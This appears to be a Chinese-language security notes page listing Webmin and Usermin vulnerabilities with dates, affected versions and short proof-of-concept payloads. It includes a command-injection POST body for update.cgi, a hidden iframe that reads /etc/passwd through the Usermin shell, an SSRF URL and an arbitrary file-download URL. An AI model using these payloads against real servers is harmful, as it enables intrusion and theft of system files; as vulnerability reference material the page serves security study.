• 应用安全

    简介

    开发语言
PHP

    用途
    系统管理

     

    CVE-2019-15642

    Date
    2019.7

    类型
    远程代码执行

    影响范围
    Webmin <= 1.920

    复现
    POC|EXP
    OBJECT Socket;print "Content-Type: text/plain

";$cmd='id'; print "$cmd

";
     

    分析

    反序列化导致远程代码执行

    CVE-2019-15107

    Date
2019

类型
远程代码执行
    
影响范围

    Webmin <= 1.920

    前置条件
    /password_change.cgi可访问

    复现
    POC | EXP


    
分析

    CVE-2019-12840

    Date
2019.6

类型
远程代码执行

影响范围
v 1.910

复现
    POC|EXP
    (1)
    POST: https://url/package-updates/update.cgi 
    Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
    mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
    (2)
    POST: https://url/package-updates/update.cgi 
    Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
    

分析

    XSS vulnerability that leads to Remote Code Execution

    Date
2017

类型
XSS导致远程代码执行

影响范围
Webmin version 1.850

    前置条件
    /at/create_job.cgi可访问
     

    CSRF

    Date
2017

类型
CSRF

影响范围
Webmin version 1.850

    SSRF

    Date
2017

类型
SSRF

    影响范围
Webmin version     1.850

    复现
    POC|EXP
    https://xx.org:8443/tunnel/link.cgi/https://baidu.com

    HTML Email Command Execution Vulnerability

    Date

类型
远程命令执行

影响范围
    Usermin versions <= 1.080
    
复现
POC    |EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>

    任意文件下载

    Date
2004

类型
任意文件下载

影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
    
前置条件
    /dansguardian/edit.cgi 可访问

复现
POC|EXP
    https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]
  • 相关阅读:
    php method_exists( $object , string $method_name )
    php伪类型 (mixed)
    6.6-2-数组与数据结构(用数组及其函数实现堆栈等数据结构)
    6.6-1-php数组相关(2)
    2017.6.5-2-php数组相关(1)
    2017.6.5-1-php函数应用及流程控制
    CodePage
    bat批处理教程
    pip安装及源
    CentOS安装Python3
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/12055981.html
Copyright © 2020-2023  润新知